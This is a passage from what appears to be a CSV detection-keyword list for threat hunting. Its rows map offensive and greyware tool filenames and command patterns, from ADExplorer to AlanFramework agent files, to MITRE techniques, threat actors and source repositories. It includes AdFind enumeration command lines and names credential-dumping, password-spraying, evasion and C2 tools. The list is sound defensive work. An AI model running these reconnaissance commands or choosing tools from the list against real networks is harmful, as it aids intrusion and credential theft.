It can be abused by malicious actors,T1003.001 - T1087.001,TA0006 - TA0007,N/A,N/A,AD Enumeration,https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*ADExplorerSnapshot.py*,offensive_tool_keyword,ADExplorerSnapshot.py,ADExplorerSnapshot.py is an AD Explorer snapshot parser. It is made as an ingestor for BloodHound and also supports full-object dumping to NDJSON.,T1595 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/c3c/ADExplorerSnapshot.py,1,1,N/A,N/A,7,680,90,2023-08-24T11:58:03Z,2021-12-22T14:42:23Z -*ADExplorerSnapshot.py.git*,offensive_tool_keyword,ADExplorerSnapshot.py,ADExplorerSnapshot.py is an AD Explorer snapshot parser. It is made as an ingestor for BloodHound and also supports full-object dumping to NDJSON.,T1595 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/c3c/ADExplorerSnapshot.py,1,1,N/A,N/A,7,680,90,2023-08-24T11:58:03Z,2021-12-22T14:42:23Z -*adfind -f *,greyware_tool_keyword,adfind,Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. 
Such reconnaissance activities often precede more damaging attacks.,T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482,TA0001 - TA0002 - TA0003 - TA0007 - TA0011,SolarWinds Compromise,FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass,Reconnaissance,https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*adfind -f objectclass=trusteddomain*,greyware_tool_keyword,adfind,query domain trusts with adfind,T1482 - T1018,TA0007,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*adfind -sc trustdmp*,greyware_tool_keyword,adfind,query domain trusts with adfind,T1482 - T1018,TA0007,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*adfind.bat*,greyware_tool_keyword,adfind,Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. 
Such reconnaissance activities often precede more damaging attacks.,T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482,TA0001 - TA0002 - TA0003 - TA0007 - TA0011,SolarWinds Compromise,FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass,Reconnaissance,https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*adfind.exe -f (objectcategory=organizationalUnit) > *.txt*,offensive_tool_keyword,adfind,attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files,T1548 T1134 T1078 T1078.002,TA0004,N/A,N/A,Exploitation tools,http://www.joeware.net/freetools/tools/adfind/index.htm,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*adfind.exe -f (objectcategory=person) > *.txt*,offensive_tool_keyword,adfind,attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files,T1548 T1134 T1078 T1078.002,TA0004,N/A,N/A,Exploitation tools,http://www.joeware.net/freetools/tools/adfind/index.htm,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*adfind.exe -f *(objectcategory=group)* > *.txt*,offensive_tool_keyword,adfind,attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files,T1548 T1134 T1078 T1078.002,TA0004,N/A,N/A,Exploitation tools,http://www.joeware.net/freetools/tools/adfind/index.htm,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*adfind.exe -f objectcategory=computer > *.txt*,offensive_tool_keyword,adfind,attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files,T1548 T1134 T1078 T1078.002,TA0004,N/A,N/A,Exploitation tools,http://www.joeware.net/freetools/tools/adfind/index.htm,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*adfind.exe -f objectclass=trusteddomain*,greyware_tool_keyword,adfind,query 
domain trusts with adfind,T1482 - T1018,TA0007,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*adfind.exe -gcb -sc trustdmp > *.txt*,offensive_tool_keyword,adfind,attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files,T1548 T1134 T1078 T1078.002,TA0004,N/A,N/A,Exploitation tools,http://www.joeware.net/freetools/tools/adfind/index.htm,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*AdFind.exe -sc getacls -sddlfilter *computer* -recmute*,offensive_tool_keyword,POC,command used in the method prerequisites of the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*adfind.exe -sc trustdmp*,greyware_tool_keyword,adfind,query domain trusts with adfind,T1482 - T1018,TA0007,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*adfind.exe -subnets -f (objectCategory=subnet) > *.txt*,offensive_tool_keyword,adfind,attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files,T1548 T1134 T1078 T1078.002,TA0004,N/A,N/A,Exploitation tools,http://www.joeware.net/freetools/tools/adfind/index.htm,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*adfind.exe*,greyware_tool_keyword,adfind,Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. 
Such reconnaissance activities often precede more damaging attacks.,T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482,TA0001 - TA0002 - TA0003 - TA0007 - TA0011,SolarWinds Compromise,FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass,Reconnaissance,https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*AdFind.zip*,greyware_tool_keyword,adfind,Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.,T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482,TA0001 - TA0002 - TA0003 - TA0007 - TA0011,SolarWinds Compromise,FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass,Reconnaissance,https://www.joeware.net/freetools/tools/adfind/usage.htm,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*ADFSDump.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*ADFSpoof.py*,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,1,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*ADFSpoof-master*,offensive_tool_keyword,ADFSpoof,A python tool to forge AD FS security tokens.,T1600 - T1600.001 - T1552 - T1552.004,TA0006 - TA0001,N/A,N/A,Sniffing & Spoofing,https://github.com/mandiant/ADFSpoof,1,1,N/A,10,4,300,52,2023-09-21T17:14:52Z,2019-03-20T22:30:58Z -*ADFSpray.csv*,offensive_tool_keyword,adfspray,Python3 tool to perform password spraying against Microsoft Online service using various methods,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/xFreed0m/ADFSpray,1,1,N/A,N/A,1,75,14,2023-03-12T00:21:34Z,2020-04-23T08:56:51Z -*adfspray.git*,offensive_tool_keyword,adfspray,Python3 tool to perform password spraying against Microsoft Online service using various methods,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/xFreed0m/ADFSpray,1,1,N/A,N/A,1,75,14,2023-03-12T00:21:34Z,2020-04-23T08:56:51Z -*ADFSpray.py*,offensive_tool_keyword,adfspray,Python3 tool to perform password spraying against Microsoft Online service using various methods,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/xFreed0m/ADFSpray,1,1,N/A,N/A,1,75,14,2023-03-12T00:21:34Z,2020-04-23T08:56:51Z 
-*ADHunt-main.zip*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,1,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -*adidnsdump -u *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*adidnsdump*,offensive_tool_keyword,adidnsdump,By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones. similar to a zone transfer. This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.,T1018 - T1087 - T1201 - T1056 - T1039,TA0005 - TA0009,N/A,N/A,Information Gathering,https://github.com/dirkjanm/adidnsdump,1,0,N/A,N/A,8,772,105,2023-06-20T07:49:31Z,2019-04-24T17:18:46Z -*ad-ldap-enum.py*,offensive_tool_keyword,ad-ldap-enum,An LDAP based Active Directory user and group enumeration tool,T1087 - T1087.001 - T1018 - T1069 - T1069.002,TA0007 - TA0003 - TA0004,N/A,N/A,AD Enumeration,https://github.com/CroweCybersecurity/ad-ldap-enum,1,1,N/A,6,3,290,72,2023-02-10T19:07:34Z,2015-08-25T19:38:39Z -*ad-ldap-enum-main*,offensive_tool_keyword,ad-ldap-enum,An LDAP based Active Directory user and group enumeration tool,T1087 - T1087.001 - T1018 - T1069 - T1069.002,TA0007 - TA0003 - TA0004,N/A,N/A,AD Enumeration,https://github.com/CroweCybersecurity/ad-ldap-enum,1,1,N/A,6,3,290,72,2023-02-10T19:07:34Z,2015-08-25T19:38:39Z -*adm|admin|root|sudo|wheel*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - 
TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,0,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*admin.kirbi*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*Admin2Sys.exe*,offensive_tool_keyword,Admin2Sys,Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM,T1055.002 - T1078.003 - T1068,TA0002 - TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/S12cybersecurity/Admin2Sys,1,1,N/A,10,1,31,15,2023-05-01T19:32:41Z,2023-05-01T18:50:51Z -*Admin2Sys-main*,offensive_tool_keyword,Admin2Sys,Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM,T1055.002 - T1078.003 - T1068,TA0002 - TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/S12cybersecurity/Admin2Sys,1,1,N/A,10,1,31,15,2023-05-01T19:32:41Z,2023-05-01T18:50:51Z -*Adminisme/ServerScan/*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*adobe_top100_pass.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ADRecon -OutputDir *,greyware_tool_keyword,adrecon,ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.,T1018 - T1087.001 - T1069.001 - T1003.002 - T1482,TA0007 - TA0009 - TA0040,N/A,N/A,AD Enumeration,https://github.com/adrecon/ADRecon,1,0,greyware tool - risks of False positive !,N/A,5,487,83,2023-08-08T21:44:01Z,2018-12-15T13:00:09Z -*ADRecon.ps1*,greyware_tool_keyword,adrecon,ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.,T1018 - T1087.001 - T1069.001 - T1003.002 - T1482,TA0007 - TA0009 - TA0040,N/A,N/A,AD Enumeration,https://github.com/adrecon/ADRecon,1,1,greyware tool - risks of False positive !,N/A,5,487,83,2023-08-08T21:44:01Z,2018-12-15T13:00:09Z -*adsearch* --domain-admins*,offensive_tool_keyword,adsearch,A tool to help query AD via the LDAP protocol,T1087 - T1069.002 - T1018,TA0003 - TA0002 - TA0007,N/A,N/A,Reconnaissance,https://github.com/tomcarver16/ADSearch,1,0,N/A,N/A,4,370,44,2023-07-07T14:39:50Z,2020-06-17T22:21:41Z -*adsearch.exe*,offensive_tool_keyword,adsearch,A tool to help query AD via the LDAP protocol,T1087 - T1069.002 - T1018,TA0003 - TA0002 - TA0007,N/A,N/A,Reconnaissance,https://github.com/tomcarver16/ADSearch,1,1,N/A,N/A,4,370,44,2023-07-07T14:39:50Z,2020-06-17T22:21:41Z -*ADSearch.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# 
offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*ADSearch.sln*,offensive_tool_keyword,adsearch,A tool to help query AD via the LDAP protocol,T1087 - T1069.002 - T1018,TA0003 - TA0002 - TA0007,N/A,N/A,Reconnaissance,https://github.com/tomcarver16/ADSearch,1,1,N/A,N/A,4,370,44,2023-07-07T14:39:50Z,2020-06-17T22:21:41Z -*ADSearch\ADSearch.cs*,offensive_tool_keyword,adsearch,A tool to help query AD via the LDAP protocol,T1087 - T1069.002 - T1018,TA0003 - TA0002 - TA0007,N/A,N/A,Reconnaissance,https://github.com/tomcarver16/ADSearch,1,0,N/A,N/A,4,370,44,2023-07-07T14:39:50Z,2020-06-17T22:21:41Z -*adsearch-master.zip,offensive_tool_keyword,adsearch,A tool to help query AD via the LDAP protocol,T1087 - T1069.002 - T1018,TA0003 - TA0002 - TA0007,N/A,N/A,Reconnaissance,https://github.com/tomcarver16/ADSearch,1,1,N/A,N/A,4,370,44,2023-07-07T14:39:50Z,2020-06-17T22:21:41Z -*ADSyncDecrypt.exe*,offensive_tool_keyword,adconnectdump,Dump Azure AD Connect credentials for Azure AD and Active Directory,T1003.004 - T1059.001 - T1082,TA0006 - TA0002 - TA0007,N/A,N/A,Credential Access,https://github.com/fox-it/adconnectdump,1,1,N/A,10,6,506,84,2023-08-21T00:00:08Z,2019-04-09T07:41:42Z -*ADSyncGather.exe*,offensive_tool_keyword,adconnectdump,Dump Azure AD Connect credentials for Azure AD and Active Directory,T1003.004 - T1059.001 - T1082,TA0006 - TA0002 - TA0007,N/A,N/A,Credential 
Access,https://github.com/fox-it/adconnectdump,1,1,N/A,10,6,506,84,2023-08-21T00:00:08Z,2019-04-09T07:41:42Z -*ADSyncQuery*ADSync.mdf*.txt*,offensive_tool_keyword,adconnectdump,Dump Azure AD Connect credentials for Azure AD and Active Directory,T1003.004 - T1059.001 - T1082,TA0006 - TA0002 - TA0007,N/A,N/A,Credential Access,https://github.com/fox-it/adconnectdump,1,0,N/A,10,6,506,84,2023-08-21T00:00:08Z,2019-04-09T07:41:42Z -*Advanced IP Scanner*,greyware_tool_keyword,advanced-ip-scanner,The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA),T1595 - T1046,TA0007 - TA0011,N/A,Conti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9,Reconnaissance,https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*advanced_ip_scanner*,greyware_tool_keyword,advanced-ip-scanner,The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA),T1595 - T1046,TA0007 - TA0011,N/A,Conti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9,Reconnaissance,https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Advanced_IP_Scanner*.exe*,greyware_tool_keyword,advanced-ip-scanner,The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. 
It is easy to use and runs as a portable edition (abused by TA),T1595 - T1046,TA0007 - TA0011,N/A,Conti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9,Reconnaissance,https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*Advanced_Port_Scanner_*.exe*,greyware_tool_keyword,advanced port scanner,port scanner tool abused by ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://www.advanced-port-scanner.com/,1,1,N/A,7,10,N/A,N/A,N/A,N/A
-*Advanced-SQL-Injection-Cheatsheet*,offensive_tool_keyword,Advanced-SQL-Injection-Cheatsheet,A cheat sheet that contains advanced queries for SQL Injection of all types.,T1548 T1562 T1027,N/A,N/A,N/A,Exploitation tools,https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet,1,1,N/A,N/A,10,2239,568,2023-05-13T17:15:20Z,2020-10-23T18:14:47Z
-*advantech_iview_networkservlet_cmd_inject.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*adxcsouf2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-*ADZero.py*,offensive_tool_keyword,POC,Zerologon CVE exploitation,T1210 - T1072,TA0001 - TA0009,N/A,N/A,Exploitation tools,https://github.com/Privia-Security/ADZero,1,1,N/A,N/A,1,20,6,2020-10-02T13:00:21Z,2020-09-29T20:43:06Z
-*aem2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-*AES_cryptor.py *,offensive_tool_keyword,FilelessPELoader,Loading Remote AES Encrypted PE in memory - Decrypted it and run it,T1027.001 - T1059.001 - T1071,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/FilelessPELoader,1,0,N/A,10,8,727,148,2023-08-29T21:46:11Z,2023-02-08T16:59:33Z
-*AesEncryptor.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z
-*AF9C62A1-F8D2-4BE0-B019-0A7873E81EA9*,offensive_tool_keyword,GadgetToJScript,A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.,T1059.001 - T1078 - T1059.005,TA0002 - TA0004 - TA0001,N/A,N/A,Exploitation tools,https://github.com/med0x2e/GadgetToJScript,1,0,N/A,10,8,777,157,2021-07-26T17:35:40Z,2019-10-05T12:27:19Z
-*ag_load_script*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z
-*agent*DNSCommunication.cpp*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,0,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z
-*agent/cmd_download_files.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z
-*agent/cmd_exec.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z
-*agent/cmd_kill.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z
-*agent/cmd_proxy.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z
-*agent/cmd_run.c*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z
-*agent/cmd_shell.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z
